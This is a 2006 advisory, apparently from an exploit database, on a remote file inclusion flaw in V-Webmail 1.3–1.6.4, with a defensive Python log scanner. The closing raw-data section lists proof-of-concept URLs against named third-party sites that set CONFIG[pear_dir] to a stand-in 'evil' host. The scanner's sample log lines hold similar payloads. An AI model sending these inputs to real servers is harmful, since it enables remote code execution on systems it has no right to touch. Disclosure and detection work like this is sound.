Vendor: V-Webmail
By: beford
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: 98
Product Name: V-Webmail
Affected Version From: 1.3
Affected Version To: 1.6.4
Patch Exists: YES
Related CWE: N/A
CPE: a:v-webmail:v-webmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

V-Webmail 1.6.4

V-Webmail is a powerful PHP-based webmail application with an abundance of features, including many innovative ideas for web applications. The vulnerability exists in the v-webmail/includes/pear/*/*.php and v-webmail/includes/mailaccess/pop3.php files, which build a require_once path from $CONFIG['pear_dir']. An attacker who controls the CONFIG[pear_dir] request parameter can therefore make the application include a remote file. Versions 1.3, 1.5 and 1.6.4 are vulnerable.

Mitigation:

Upgrade to the latest version of V-Webmail.
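
One way to find requests that set CONFIG[pear_dir] in web server access logs, as an added example that is not part of the original advisory or the V-Webmail code. It assumes combined-format logs; the log lines, addresses and the remote.example host are constructed, and classify/scan are hypothetical names.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format; addresses and hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/May/2006:10:00:01 +0000] "GET /v-webmail/includes/mailaccess/'
    'pop3.php?CONFIG[pear_dir]=http://remote.example/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/May/2006:10:00:05 +0000] "GET /v-webmail/includes/mailaccess/'
    'pop3.php?CONFIG%5Bpear_dir%5D=hTTp%3A%2F%2Fremote.example%2F HTTP/1.1" 200 512',
    '198.51.100.9 - - [25/May/2006:10:01:00 +0000] "GET /v-webmail/includes/pear/Net/'
    'POP3.php?CONFIG[pear_dir]=../../tmp/ HTTP/1.1" 200 0',
    '198.51.100.4 - - [25/May/2006:10:02:00 +0000] "GET /v-webmail/index.php?'
    'folder=INBOX HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Any URI scheme prefix (http:, ftp:, php:, data:, ...) at the start of the value.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*:', re.IGNORECASE)
# PHP variable names are case-sensitive, so match CONFIG exactly.
CONFIG_KEY_RE = re.compile(r'^CONFIG(\[|$)')


def classify(line):
    """Return (severity, name, value) for a request that sets CONFIG[...], else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes names and values, so CONFIG%5Bpear_dir%5D matches too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if CONFIG_KEY_RE.match(name):
            # Configuration should never arrive in a request; a URI scheme is worse.
            severity = "high" if SCHEME_RE.match(value) else "medium"
            return severity, name, value
    return None


def scan(lines):
    """Return (line_number, severity, name, value) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((number, *result))
    return hits


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Parameters sent in a POST body or cookie do not appear in access logs, so this covers query strings only.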

Exploit-DB raw data:

Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php => require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5 - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

# milw0rm.com [2006-05-25]